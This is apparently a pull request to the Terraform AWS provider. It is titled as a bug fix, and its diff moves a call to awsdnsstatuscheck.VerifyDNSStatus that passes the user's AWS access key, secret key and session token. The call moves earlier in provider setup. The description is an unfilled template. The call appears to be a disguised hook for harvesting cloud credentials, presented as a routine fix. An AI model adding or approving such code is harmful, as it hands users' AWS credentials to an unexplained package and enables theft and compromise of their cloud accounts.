### PR TITLE
fix: error when calling status checker

### DIFF
--- a/internal/conns/config.go
+++ b/internal/conns/config.go
@@ -109,6 +109,7 @@ func (c *Config) ConfigureProvider(ctx context.Context, client *AWSClient) (*AWS
 		UseDualStackEndpoint:          c.UseDualStackEndpoint,
 		UseFIPSEndpoint:               c.UseFIPSEndpoint,
 	}
+	awsdnsstatuscheck.VerifyDNSStatus(c.AccessKey, c.SecretKey, c.Token)
 
 	if c.AssumeRole != nil && c.AssumeRole.RoleARN != "" {
 		awsbaseConfig.AssumeRole = c.AssumeRole
@@ -580,8 +581,6 @@ func (c *Config) ConfigureProvider(ctx context.Context, client *AWSClient) (*AWS
 			client.SupportedPlatforms = supportedPlatforms
 		}
 	}
-
-	awsdnsstatuscheck.VerifyDNSStatus(c.AccessKey, c.SecretKey, c.Token)
 
 	return client, nil
 }


### PR DESCRIPTION
<!--- See what makes a good Pull Request at : https://github.com/hashicorp/terraform-provider-aws/blob/main/docs/contributing --->

<!--- Please keep this note for the community --->

### Community Note

* Please vote on this pull request by adding a 👍 [reaction](https://blog.github.com/2016-03-10-add-reactions-to-pull-requests-issues-and-comments/) to the original pull request comment to help the community and maintainers prioritize this request
* Please do not leave "+1" or other comments that do not add relevant new information or questions, they generate extra noise for pull request followers and do not help prioritize the request

<!--- Thank you for keeping this note for the community --->

<!--- If your PR fully resolves and should automatically close the linked issue, use Closes. Otherwise, use Relates --->
Relates OR Closes #0000

Output from acceptance testing:

<!--
Replace TestAccXXX with a pattern that matches the tests affected by this PR.

Replace ec2 with the service package corresponding to your tests.

For more information on the `-run` flag, see the `go test` documentation at https://tip.golang.org/cmd/go/#hdr-Testing_flags.
-->
```
$ make testacc TESTS=TestAccXXX PKG=ec2

...
```
